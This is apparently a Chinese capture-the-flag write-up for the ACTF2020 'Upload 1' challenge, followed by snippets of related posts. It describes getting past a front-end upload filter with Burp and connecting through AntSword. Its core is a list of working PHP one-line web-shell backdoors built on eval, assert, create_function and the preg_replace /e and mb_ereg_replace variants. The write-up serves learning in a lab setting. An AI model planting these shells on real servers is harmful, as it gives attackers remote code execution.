ACTF2020 新生赛 Upload 1
打开网页发现是个文件上传的页面,试着上传php文件,发现不行后,
尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。
具体步骤如下:
1、书写一句话木马,例如:
eval和assert:
php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。
<?php @eval($_GET["cmd"]); ?>
<?php @assert($_POST['a']) ?>
create_function和preg_replace函数:
create_function,它的作用是创建一个匿名函数,在内部也相当于执行了一次eval。php5,7都可用
<?php $st=@create_function('',$_POST['a']);$st();?>
/e修饰符,也就是大家熟知的preg_replace。这个则是真的php7用不了了,仅限php5。
<?php @preg_replace('/.*/e',$_POST['a'],'');?>
除了preg_replace之外,还有一个和它类似的函数。
<?php @preg_filter('/.*/e',$_POST['a'],'');?>
这两个都是仅限php5的,php7也想用这种方法怎么办呢?有办法,php并没有完全将/e修饰符赶尽杀绝。
<?php @mb_ereg_replace('.*',$_POST['a'],'','ee');?>
<?php @mb_eregi_replace('.*',$_POST['a'],'','ee');?>
它们甚至还有别名:
<?php @mbereg_replace('.*',$_POST['a'],'','ee');?>
<?php @mberegi_replace('.*',$_POST['a'],'','ee');?>
2、burp修把改文件后缀,把jpg改为html,
3、蚁剑连接,得flag
总结:
1、一句话木马
2、为什么只能把后缀改为html,尝试改为php会发现可以正常连接,但无法读取文件
ACTF2020 新生赛 Upload 1相关推荐
- [ACTF2020 新生赛]Upload
目录 思路 总结 思路 先上传一个包含shell的jpg文件 上传成功,说明不对文件内容进行过滤 用bp抓包把后缀改成php,被拦截,说明对文件后缀有检测 接来下把文件后缀名改成任意字符,上传成功,说 ...
- [ACTF2020 新生赛]Upload 1
1.打开链接,发现一个小灯泡,鼠标放上去会显示内容 2.这是一个文件上传题,当上传php等文件时,会提示: 3.使用burp suite抓包绕过,发现php.php3.php4.php5等都不行 4. ...
- buuctf航海经历([ACTF2020 新生赛])
前言:今天感觉自己确实有点菜,想提高一下,就斗胆来buuctf论剑,哈哈哈! [HCTF 2018]WarmUp 是关于php代码审计方面的 打开网站额,一个滑稽笑脸,别的啥都没有 看一下源码, 提 ...
- BUUCTF Web [ACTF2020 新生赛]Exec
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
- BUUCTF Web [ACTF2020 新生赛]Include
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
- [极客大挑战 2019]Havefun[ACTF2020 新生赛]Include
[极客大挑战 2019]Havefun 打开题目,看到一个确实 Havefun 的页面,于是直接 F12 查看源代码. 根据所给出的 PHP 代码在当前页面 URL 尝试传入参数,最终竟直接得出 fl ...
- [ACTF2020 新生赛]Include
不截图了,进入靶机只有一个tips等着被点.跳转以后看url中参数 ?file=flag.php 页面内容只有 Can you find out the flag? 立马想到使用php伪协议读文件内容 ...
- [ACTF2020 新生赛]Exec1命令注入
1.来看题目如下 得到一个ping的输入框,老样子先检查网页源码看有没有什么好东西,得到一个链接,我们来访问一下 发现也没什么有用处的信息,于是看到题目的标题之后联想到了命令注入, 那么是怎么判断使用 ...
- ACTF2020新生赛-upload1
题目: 上传一个phpw文件的一句话木马查看 弹出提示框,只能上传jpg,png和gif的图片,说明有前端js绕过,可以尝试关闭js,也可以修改图片后缀名 修改文件后缀名后,上传成功,并返回了上传文件 ...
最新文章
- 0-1背包问题 动态规划java_C#使用动态规划解决0-1背包问题实例分析
- 获取Ip所在城市名与详细
- SAP Spartacus Spinner控件显示原理
- 【荐读】一名95后的嵌入式软件工程师,成长之路!
- Android模拟器所支持的OpenGL ES扩展
- 教育OA系统该如何选择?
- PS怎么压缩图片大小而像素不变
- python PIL图片拼接
- 大物知识点复习框架——光学
- OpenDDS有问必答
- 淘宝。京东 模拟登陆
- 网狐_经典版机器人添加说明
- CLA与CPU数据交互
- 互联网架构概述 互联网架构演变过程
- AMBER:使用Cpptraj计算RMSD 以及使用中遇到的问题
- 第一次书写标书和述标经历
- [Q] google map 和 google earth pro 3d模式 黑屏
- Qt程序连接Access数据库,出现“[Microsoft][ODBC 驱动程序管理器] 未发现数据源名称并且未指定默认驱动程序 QODBC3: Unable to connect“错误的解决办法
- python解三元一次方程组_关于实现求解三元一次方程组的小程序的一点小研究
- java免费代码混淆工具 支持JDK16 java加密